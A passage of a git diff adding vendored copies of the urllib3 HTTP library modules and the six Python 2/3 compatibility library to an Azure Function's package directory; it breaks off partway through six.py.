:class:`http.client.IncompleteRead` to allow int value + for ``partial`` to avoid creating large objects on streamed reads. + """ + + def __init__(self, partial, expected): + super(IncompleteRead, self).__init__(partial, expected) + + def __repr__(self): + return "IncompleteRead(%i bytes read, %i more expected)" % ( + self.partial, + self.expected, + ) + + +class InvalidChunkLength(HTTPError, httplib_IncompleteRead): + """Invalid chunk length in a chunked response.""" + + def __init__(self, response, length): + super(InvalidChunkLength, self).__init__( + response.tell(), response.length_remaining + ) + self.response = response + self.length = length + + def __repr__(self): + return "InvalidChunkLength(got length %r, %i bytes read)" % ( + self.length, + self.partial, + ) + + +class InvalidHeader(HTTPError): + """The header provided was somehow invalid.""" + + pass + + +class ProxySchemeUnknown(AssertionError, URLSchemeUnknown): + """ProxyManager does not support the supplied scheme""" + + # TODO(t-8ch): Stop inheriting from AssertionError in v2.0. + + def __init__(self, scheme): + # 'localhost' is here because our URL parser parses + # localhost:8080 -> scheme=localhost, remove if we fix this. + if scheme == "localhost": + scheme = None + if scheme is None: + message = "Proxy URL had no scheme, should start with http:// or https://" + else: + message = ( + "Proxy URL had unsupported scheme %s, should use http:// or https://" + % scheme + ) + super(ProxySchemeUnknown, self).__init__(message) + + +class ProxySchemeUnsupported(ValueError): + """Fetching HTTPS resources through HTTPS proxies is unsupported""" + + pass + + +class HeaderParsingError(HTTPError): + """Raised by assert_header_parsing, but we convert it to a log.warning statement.""" + + def __init__(self, defects, unparsed_data): + message = "%s, unparsed data: %r" % (defects or "Unknown", unparsed_data) + super(HeaderParsingError, self).__init__(message) + + +class UnrewindableBodyError(HTTPError): + """urllib3 encountered an error when trying to rewind a body""" + + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/fields.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/fields.py new file mode 100644 index 0000000..fcd526e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/fields.py @@ -0,0 +1,274 @@ +from __future__ import absolute_import + +import email.utils +import mimetypes +import re + +from .packages import six + + +def guess_content_type(filename, default="application/octet-stream"): + """ + Guess the "Content-Type" of a file. + + :param filename: + The filename to guess the "Content-Type" of using :mod:`mimetypes`. + :param default: + If no "Content-Type" can be guessed, default to `default`. + """ + if filename: + return mimetypes.guess_type(filename)[0] or default + return default + + +def format_header_param_rfc2231(name, value): + """ + Helper function to format and quote a single header parameter using the + strategy defined in RFC 2231. + + Particularly useful for header parameters which might contain + non-ASCII values, like file names. This follows + `RFC 2388 Section 4.4 `_. + + :param name: + The name of the parameter, a string expected to be ASCII only. + :param value: + The value of the parameter, provided as ``bytes`` or `str``. + :ret: + An RFC-2231-formatted unicode string. + """ + if isinstance(value, six.binary_type): + value = value.decode("utf-8") + + if not any(ch in value for ch in '"\\\r\n'): + result = u'%s="%s"' % (name, value) + try: + result.encode("ascii") + except (UnicodeEncodeError, UnicodeDecodeError): + pass + else: + return result + + if six.PY2: # Python 2: + value = value.encode("utf-8") + + # encode_rfc2231 accepts an encoded string and returns an ascii-encoded + # string in Python 2 but accepts and returns unicode strings in Python 3 + value = email.utils.encode_rfc2231(value, "utf-8") + value = "%s*=%s" % (name, value) + + if six.PY2: # Python 2: + value = value.decode("utf-8") + + return value + + +_HTML5_REPLACEMENTS = { + u"\u0022": u"%22", + # Replace "\" with "\\". + u"\u005C": u"\u005C\u005C", +} + +# All control characters from 0x00 to 0x1F *except* 0x1B. +_HTML5_REPLACEMENTS.update( + { + six.unichr(cc): u"%{:02X}".format(cc) + for cc in range(0x00, 0x1F + 1) + if cc not in (0x1B,) + } +) + + +def _replace_multiple(value, needles_and_replacements): + def replacer(match): + return needles_and_replacements[match.group(0)] + + pattern = re.compile( + r"|".join([re.escape(needle) for needle in needles_and_replacements.keys()]) + ) + + result = pattern.sub(replacer, value) + + return result + + +def format_header_param_html5(name, value): + """ + Helper function to format and quote a single header parameter using the + HTML5 strategy. + + Particularly useful for header parameters which might contain + non-ASCII values, like file names. This follows the `HTML5 Working Draft + Section 4.10.22.7`_ and matches the behavior of curl and modern browsers. + + .. _HTML5 Working Draft Section 4.10.22.7: + https://w3c.github.io/html/sec-forms.html#multipart-form-data + + :param name: + The name of the parameter, a string expected to be ASCII only. + :param value: + The value of the parameter, provided as ``bytes`` or `str``. + :ret: + A unicode string, stripped of troublesome characters. + """ + if isinstance(value, six.binary_type): + value = value.decode("utf-8") + + value = _replace_multiple(value, _HTML5_REPLACEMENTS) + + return u'%s="%s"' % (name, value) + + +# For backwards-compatibility. +format_header_param = format_header_param_html5 + + +class RequestField(object): + """ + A data container for request body parameters. + + :param name: + The name of this request field. Must be unicode. + :param data: + The data/value body. + :param filename: + An optional filename of the request field. Must be unicode. + :param headers: + An optional dict-like object of headers to initially use for the field. + :param header_formatter: + An optional callable that is used to encode and format the headers. By + default, this is :func:`format_header_param_html5`. + """ + + def __init__( + self, + name, + data, + filename=None, + headers=None, + header_formatter=format_header_param_html5, + ): + self._name = name + self._filename = filename + self.data = data + self.headers = {} + if headers: + self.headers = dict(headers) + self.header_formatter = header_formatter + + @classmethod + def from_tuples(cls, fieldname, value, header_formatter=format_header_param_html5): + """ + A :class:`~urllib3.fields.RequestField` factory from old-style tuple parameters. + + Supports constructing :class:`~urllib3.fields.RequestField` from + parameter of key/value strings AND key/filetuple. A filetuple is a + (filename, data, MIME type) tuple where the MIME type is optional. + For example:: + + 'foo': 'bar', + 'fakefile': ('foofile.txt', 'contents of foofile'), + 'realfile': ('barfile.txt', open('realfile').read()), + 'typedfile': ('bazfile.bin', open('bazfile').read(), 'image/jpeg'), + 'nonamefile': 'contents of nonamefile field', + + Field names and filenames must be unicode. + """ + if isinstance(value, tuple): + if len(value) == 3: + filename, data, content_type = value + else: + filename, data = value + content_type = guess_content_type(filename) + else: + filename = None + content_type = None + data = value + + request_param = cls( + fieldname, data, filename=filename, header_formatter=header_formatter + ) + request_param.make_multipart(content_type=content_type) + + return request_param + + def _render_part(self, name, value): + """ + Overridable helper function to format a single header parameter. By + default, this calls ``self.header_formatter``. + + :param name: + The name of the parameter, a string expected to be ASCII only. + :param value: + The value of the parameter, provided as a unicode string. + """ + + return self.header_formatter(name, value) + + def _render_parts(self, header_parts): + """ + Helper function to format and quote a single header. + + Useful for single headers that are composed of multiple items. E.g., + 'Content-Disposition' fields. + + :param header_parts: + A sequence of (k, v) tuples or a :class:`dict` of (k, v) to format + as `k1="v1"; k2="v2"; ...`. + """ + parts = [] + iterable = header_parts + if isinstance(header_parts, dict): + iterable = header_parts.items() + + for name, value in iterable: + if value is not None: + parts.append(self._render_part(name, value)) + + return u"; ".join(parts) + + def render_headers(self): + """ + Renders the headers for this request field. + """ + lines = [] + + sort_keys = ["Content-Disposition", "Content-Type", "Content-Location"] + for sort_key in sort_keys: + if self.headers.get(sort_key, False): + lines.append(u"%s: %s" % (sort_key, self.headers[sort_key])) + + for header_name, header_value in self.headers.items(): + if header_name not in sort_keys: + if header_value: + lines.append(u"%s: %s" % (header_name, header_value)) + + lines.append(u"\r\n") + return u"\r\n".join(lines) + + def make_multipart( + self, content_disposition=None, content_type=None, content_location=None + ): + """ + Makes this request field into a multipart request field. + + This method overrides "Content-Disposition", "Content-Type" and + "Content-Location" headers to the request parameter. + + :param content_type: + The 'Content-Type' of the request body. + :param content_location: + The 'Content-Location' of the request body. + + """ + self.headers["Content-Disposition"] = content_disposition or u"form-data" + self.headers["Content-Disposition"] += u"; ".join( + [ + u"", + self._render_parts( + ((u"name", self._name), (u"filename", self._filename)) + ), + ] + ) + self.headers["Content-Type"] = content_type + self.headers["Content-Location"] = content_location diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/filepost.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/filepost.py new file mode 100644 index 0000000..709fa36 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/filepost.py @@ -0,0 +1,98 @@ +from __future__ import absolute_import + +import binascii +import codecs +import os +from io import BytesIO + +from .fields import RequestField +from .packages import six +from .packages.six import b + +writer = codecs.lookup("utf-8")[3] + + +def choose_boundary(): + """ + Our embarrassingly-simple replacement for mimetools.choose_boundary. + """ + boundary = binascii.hexlify(os.urandom(16)) + if not six.PY2: + boundary = boundary.decode("ascii") + return boundary + + +def iter_field_objects(fields): + """ + Iterate over fields. + + Supports list of (k, v) tuples and dicts, and lists of + :class:`~urllib3.fields.RequestField`. + + """ + if isinstance(fields, dict): + i = six.iteritems(fields) + else: + i = iter(fields) + + for field in i: + if isinstance(field, RequestField): + yield field + else: + yield RequestField.from_tuples(*field) + + +def iter_fields(fields): + """ + .. deprecated:: 1.6 + + Iterate over fields. + + The addition of :class:`~urllib3.fields.RequestField` makes this function + obsolete. Instead, use :func:`iter_field_objects`, which returns + :class:`~urllib3.fields.RequestField` objects. + + Supports list of (k, v) tuples and dicts. + """ + if isinstance(fields, dict): + return ((k, v) for k, v in six.iteritems(fields)) + + return ((k, v) for k, v in fields) + + +def encode_multipart_formdata(fields, boundary=None): + """ + Encode a dictionary of ``fields`` using the multipart/form-data MIME format. + + :param fields: + Dictionary of fields or list of (key, :class:`~urllib3.fields.RequestField`). + + :param boundary: + If not specified, then a random boundary will be generated using + :func:`urllib3.filepost.choose_boundary`. + """ + body = BytesIO() + if boundary is None: + boundary = choose_boundary() + + for field in iter_field_objects(fields): + body.write(b("--%s\r\n" % (boundary))) + + writer(body).write(field.render_headers()) + data = field.data + + if isinstance(data, int): + data = str(data) # Backwards compatibility + + if isinstance(data, six.text_type): + writer(body).write(data) + else: + body.write(data) + + body.write(b"\r\n") + + body.write(b("--%s--\r\n" % (boundary))) + + content_type = str("multipart/form-data; boundary=%s" % boundary) + + return body.getvalue(), content_type diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..7af643f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/six.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/six.cpython-39.pyc new file mode 100644 index 0000000..0882c4f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/__pycache__/six.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..53a41ba Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/makefile.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/makefile.cpython-39.pyc new file mode 100644 index 0000000..86340e2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/__pycache__/makefile.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/makefile.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/makefile.py new file mode 100644 index 0000000..6a5b072 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/backports/makefile.py @@ -0,0 +1,51 @@ +# -*- coding: utf-8 -*- +""" +backports.makefile +~~~~~~~~~~~~~~~~~~ + +Backports the Python 3 ``socket.makefile`` method for use with anything that +wants to create a "fake" socket object. +""" +import io +from socket import SocketIO + + +def backport_makefile( + self, mode="r", buffering=None, encoding=None, errors=None, newline=None +): + """ + Backport of ``socket.makefile`` from Python 3.5. + """ + if not set(mode) <= {"r", "w", "b"}: + raise ValueError("invalid mode %r (only r, w, b allowed)" % (mode,)) + writing = "w" in mode + reading = "r" in mode or not writing + assert reading or writing + binary = "b" in mode + rawmode = "" + if reading: + rawmode += "r" + if writing: + rawmode += "w" + raw = SocketIO(self, rawmode) + self._makefile_refs += 1 + if buffering is None: + buffering = -1 + if buffering < 0: + buffering = io.DEFAULT_BUFFER_SIZE + if buffering == 0: + if not binary: + raise ValueError("unbuffered streams must be binary") + return raw + if reading and writing: + buffer = io.BufferedRWPair(raw, raw, buffering) + elif reading: + buffer = io.BufferedReader(raw, buffering) + else: + assert writing + buffer = io.BufferedWriter(raw, buffering) + if binary: + return buffer + text = io.TextIOWrapper(buffer, encoding, errors, newline) + text.mode = mode + return text diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/six.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/six.py new file mode 100644 index 0000000..af538d1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/packages/six.py @@ -0,0 +1,1077 @@ +# Copyright (c) 2010-2020 Benjamin Peterson +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Utilities for writing code that runs on Python 2 and 3""" + +from __future__ import absolute_import + +import functools +import itertools +import operator +import sys +import types + +__author__ = "Benjamin Peterson " +__version__ = "1.16.0" + + +# Useful for very coarse version differentiation. +PY2 = sys.version_info[0] == 2 +PY3 = sys.version_info[0] == 3 +PY34 = sys.version_info[0:2] >= (3, 4) + +if PY3: + string_types = (str,) + integer_types = (int,) + class_types = (type,) + text_type = str + binary_type = bytes + + MAXSIZE = sys.maxsize +else: + string_types = (basestring,) + integer_types = (int, long) + class_types = (type, types.ClassType) + text_type = unicode + binary_type = str + + if sys.platform.startswith("java"): + # Jython always uses 32 bits. + MAXSIZE = int((1 << 31) - 1) + else: + # It's possible to have sizeof(long) != sizeof(Py_ssize_t). + class X(object): + def __len__(self): + return 1 << 31 + + try: + len(X()) + except OverflowError: + # 32-bit + MAXSIZE = int((1 << 31) - 1) + else: + # 64-bit + MAXSIZE = int((1 << 63) - 1) + del X + +if PY34: + from importlib.util import spec_from_loader +else: + spec_from_loader = None + + +def _add_doc(func, doc): + """Add documentation to a function.""" + func.__doc__ = doc + + +def _import_module(name): + """Import module, returning the module after the last dot.""" + __import__(name) + return sys.modules[name] + + +class _LazyDescr(object): + def __init__(self, name): + self.name = name + + def __get__(self, obj, tp): + result = self._resolve() + setattr(obj, self.name, result) # Invokes __set__. + try: + # This is a bit ugly, but it avoids running this again by + # removing this descriptor. + delattr(obj.__class__, self.name) + except AttributeError: + pass + return result + + +class MovedModule(_LazyDescr): + def __init__(self, name, old, new=None): + super(MovedModule, self).__init__(name) + if PY3: + if new is None: + new = name + self.mod = new + else: + self.mod = old + + def _resolve(self): + return _import_module(self.mod) + + def __getattr__(self, attr): + _module = self._resolve() + value = getattr(_module, attr) + setattr(self, attr, value) + return value + + +class _LazyModule(types.ModuleType): + def __init__(self, name): + super(_LazyModule, self).__init__(name) + self.__doc__ = self.__class__.__doc__ + + def __dir__(self): + attrs = ["__doc__", "__name__"] + attrs += [attr.name for attr in self._moved_attributes] + return attrs + + # Subclasses should override this + _moved_attributes = [] + + +class MovedAttribute(_LazyDescr): + def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None): + super(MovedAttribute, self).__init__(name) + if PY3: + if new_mod is None: + new_mod = name + self.mod = new_mod + if new_attr is None: + if old_attr is None: + new_attr = name + else: + new_attr = old_attr + self.attr = new_attr + else: + self.mod = old_mod + if old_attr is None: + old_attr = name + self.attr = old_attr + + def _resolve(self): + module = _import_module(self.mod) + return getattr(module, self.attr) + + +class _SixMetaPathImporter(object): + + """ + A meta path importer to import six.moves and its submodules. + + This class implements a PEP302 finder and loader. It should be compatible + with Python 2.5 and all existing versions of Python3 + """ + + def __init__(self, six_module_name): + self.name = six_module_name + self.known_modules = {} + + def _add_module(self, mod, *fullnames): + for fullname in fullnames: + self.known_modules[self.name + "." + fullname] = mod + + def _get_module(self, fullname): + return self.known_modules[self.name + "." + fullname] + + def find_module(self, fullname, path=None): + if fullname in self.known_modules: + return self + return None + + def find_spec(self, fullname, path, target=None): + if fullname in self.known_modules: + return spec_from_loader(fullname, self) + return None + + def __get_module(self, fullname): + try: + return self.known_modules[fullname] + except KeyError: + raise ImportError("This loader does not know module " + fullname) + + def load_module(self, fullname): + try: + # in case of a reload + return sys.modules[fullname] + except KeyError: + pass + mod = self.__get_module(fullname) + if isinstance(mod, MovedModule): + mod = mod._resolve() + else: + mod.__loader__ = self + sys.modules[fullname] = mod + return mod + + def is_package(self, fullname): + """ + Return true, if the named module is a package. + + We need this method to get correct spec objects with + Python 3.4 (see PEP451) + """ + return hasattr(self.__get_module(fullname), "__path__") + + def get_code(self, fullname): + """Return None + + Required, if is_package is implemented""" + self.__get_module(fullname) # eventually raises ImportError + return None + + get_source = get_code # same as get_code + + def create_module(self, spec): + return self.load_module(spec.name) + + def exec_module(self, module): + pass + + +_importer = _SixMetaPathImporter(__name__) + + +class _MovedItems(_LazyModule): + + """Lazy loading of moved objects""" + + __path__ = [] # mark as package + + +_moved_attributes = [ + MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"), + MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"), + MovedAttribute( + "filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse" + ), + MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"), + MovedAttribute("intern", "__builtin__", "sys"), + MovedAttribute("map", "itertools", "builtins", "imap", "map"), + MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"), + MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"), + MovedAttribute("getoutput", "commands", "subprocess"), + MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute( + "reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload" + ), + MovedAttribute("reduce", "__builtin__", "functools"), + MovedAttribute("shlex_quote", "pipes", "shlex", "quote"), + MovedAttribute("StringIO", "StringIO", "io"), + MovedAttribute("UserDict", "UserDict", "collections"), + MovedAttribute("UserList", "UserList", "collections"), + MovedAttribute("UserString", "UserString", "collections"), + MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"), + MovedAttribute("zip", "itertools", "builtins", "izip", "zip"), + MovedAttribute( + "zip_longest", "itertools", "itertools", "izip_longest", "zip_longest" + ), + MovedModule("builtins", "__builtin__"), + MovedModule("configparser", "ConfigParser"), + MovedModule( + "collections_abc", + "collections", + "collections.abc" if sys.version_info >= (3, 3) else "collections", + ), + MovedModule("copyreg", "copy_reg"), + MovedModule("dbm_gnu", "gdbm", "dbm.gnu"), + MovedModule("dbm_ndbm", "dbm", "dbm.ndbm"), + MovedModule( + "_dummy_thread", + "dummy_thread", + "_dummy_thread" if sys.version_info < (3, 9) else "_thread", + ), + MovedModule("http_cookiejar", "cookielib", "http.cookiejar"), + MovedModule("http_cookies", "Cookie", "http.cookies"), + MovedModule("html_entities", "htmlentitydefs", "html.entities"), + MovedModule("html_parser", "HTMLParser", "html.parser"), + MovedModule("http_client", "httplib", "http.client"), + MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"), + MovedModule("email_mime_image", "email.MIMEImage", "email.mime.image"), + MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"), + MovedModule( + "email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart" + ), + MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"), + MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"), + MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"), + MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"), + MovedModule("cPickle", "cPickle", "pickle"), + MovedModule("queue", "Queue"), + MovedModule("reprlib", "repr"), + MovedModule("socketserver", "SocketServer"), + MovedModule("_thread", "thread", "_thread"), + MovedModule("tkinter", "Tkinter"), + MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"), + MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"), + MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"), + MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"), + MovedModule("tkinter_tix", "Tix", "tkinter.tix"), + MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"), + MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"), + MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"), + MovedModule("tkinter_colorchooser", "tkColorChooser", "tkinter.colorchooser"), + MovedModule("tkinter_commondialog", "tkCommonDialog", "tkinter.commondialog"), + MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"), + MovedModule("tkinter_font", "tkFont", "tkinter.font"), + MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"), + MovedModule("tkinter_tksimpledialog", "tkSimpleDialog", "tkinter.simpledialog"), + MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"), + MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"), + MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"), + MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"), + MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"), + MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"), +] +# Add windows specific modules. +if sys.platform == "win32": + _moved_attributes += [ + MovedModule("winreg", "_winreg"), + ] + +for attr in _moved_attributes: + setattr(_MovedItems, attr.name, attr) + if isinstance(attr, MovedModule): + _importer._add_module(attr, "moves." + attr.name) +del attr + +_MovedItems._moved_attributes = _moved_attributes + +moves = _MovedItems(__name__ + ".moves") +_importer._add_module(moves, "moves") + + +class Module_six_moves_urllib_parse(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_parse""" + + +_urllib_parse_moved_attributes = [ + MovedAttribute("ParseResult", "urlparse", "urllib.parse"), + MovedAttribute("SplitResult", "urlparse", "urllib.parse"), + MovedAttribute("parse_qs", "urlparse", "urllib.parse"), + MovedAttribute("parse_qsl", "urlparse", "urllib.parse"), + MovedAttribute("urldefrag", "urlparse", "urllib.parse"), + MovedAttribute("urljoin", "urlparse", "urllib.parse"), + MovedAttribute("urlparse", "urlparse", "urllib.parse"), + MovedAttribute("urlsplit", "urlparse", "urllib.parse"), + MovedAttribute("urlunparse", "urlparse", "urllib.parse"), + MovedAttribute("urlunsplit", "urlparse", "urllib.parse"), + MovedAttribute("quote", "urllib", "urllib.parse"), + MovedAttribute("quote_plus", "urllib", "urllib.parse"), + MovedAttribute("unquote", "urllib", "urllib.parse"), + MovedAttribute("unquote_plus", "urllib", "urllib.parse"), + MovedAttribute( + "unquote_to_bytes", "urllib", "urllib.parse", "unquote", "unquote_to_bytes" + ), + MovedAttribute("urlencode", "urllib", "urllib.parse"), + MovedAttribute("splitquery", "urllib", "urllib.parse"), + MovedAttribute("splittag", "urllib", "urllib.parse"), + MovedAttribute("splituser", "urllib", "urllib.parse"), + MovedAttribute("splitvalue", "urllib", "urllib.parse"), + MovedAttribute("uses_fragment", "urlparse", "urllib.parse"), + MovedAttribute("uses_netloc", "urlparse", "urllib.parse"), + MovedAttribute("uses_params", "urlparse", "urllib.parse"), + MovedAttribute("uses_query", "urlparse", "urllib.parse"), + MovedAttribute("uses_relative", "urlparse", "urllib.parse"), +] +for attr in _urllib_parse_moved_attributes: + setattr(Module_six_moves_urllib_parse, attr.name, attr) +del attr + +Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes + +_importer._add_module( + Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"), + "moves.urllib_parse", + "moves.urllib.parse", +) + + +class Module_six_moves_urllib_error(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_error""" + + +_urllib_error_moved_attributes = [ + MovedAttribute("URLError", "urllib2", "urllib.error"), + MovedAttribute("HTTPError", "urllib2", "urllib.error"), + MovedAttribute("ContentTooShortError", "urllib", "urllib.error"), +] +for attr in _urllib_error_moved_attributes: + setattr(Module_six_moves_urllib_error, attr.name, attr) +del attr + +Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes + +_importer._add_module( + Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"), + "moves.urllib_error", + "moves.urllib.error", +) + + +class Module_six_moves_urllib_request(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_request""" + + +_urllib_request_moved_attributes = [ + MovedAttribute("urlopen", "urllib2", "urllib.request"), + MovedAttribute("install_opener", "urllib2", "urllib.request"), + MovedAttribute("build_opener", "urllib2", "urllib.request"), + MovedAttribute("pathname2url", "urllib", "urllib.request"), + MovedAttribute("url2pathname", "urllib", "urllib.request"), + MovedAttribute("getproxies", "urllib", "urllib.request"), + MovedAttribute("Request", "urllib2", "urllib.request"), + MovedAttribute("OpenerDirector", "urllib2", "urllib.request"), + MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"), + MovedAttribute("ProxyHandler", "urllib2", "urllib.request"), + MovedAttribute("BaseHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"), + MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"), + MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"), + MovedAttribute("FileHandler", "urllib2", "urllib.request"), + MovedAttribute("FTPHandler", "urllib2", "urllib.request"), + MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"), + MovedAttribute("UnknownHandler", "urllib2", "urllib.request"), + MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"), + MovedAttribute("urlretrieve", "urllib", "urllib.request"), + MovedAttribute("urlcleanup", "urllib", "urllib.request"), + MovedAttribute("URLopener", "urllib", "urllib.request"), + MovedAttribute("FancyURLopener", "urllib", "urllib.request"), + MovedAttribute("proxy_bypass", "urllib", "urllib.request"), + MovedAttribute("parse_http_list", "urllib2", "urllib.request"), + MovedAttribute("parse_keqv_list", "urllib2", "urllib.request"), +] +for attr in _urllib_request_moved_attributes: + setattr(Module_six_moves_urllib_request, attr.name, attr) +del attr + +Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes + +_importer._add_module( + Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"), + "moves.urllib_request", + "moves.urllib.request", +) + + +class Module_six_moves_urllib_response(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_response""" + + +_urllib_response_moved_attributes = [ + MovedAttribute("addbase", "urllib", "urllib.response"), + MovedAttribute("addclosehook", "urllib", "urllib.response"), + MovedAttribute("addinfo", "urllib", "urllib.response"), + MovedAttribute("addinfourl", "urllib", "urllib.response"), +] +for attr in _urllib_response_moved_attributes: + setattr(Module_six_moves_urllib_response, attr.name, attr) +del attr + +Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes + +_importer._add_module( + Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"), + "moves.urllib_response", + "moves.urllib.response", +) + + +class Module_six_moves_urllib_robotparser(_LazyModule): + + """Lazy loading of moved objects in six.moves.urllib_robotparser""" + + +_urllib_robotparser_moved_attributes = [ + MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"), +] +for attr in 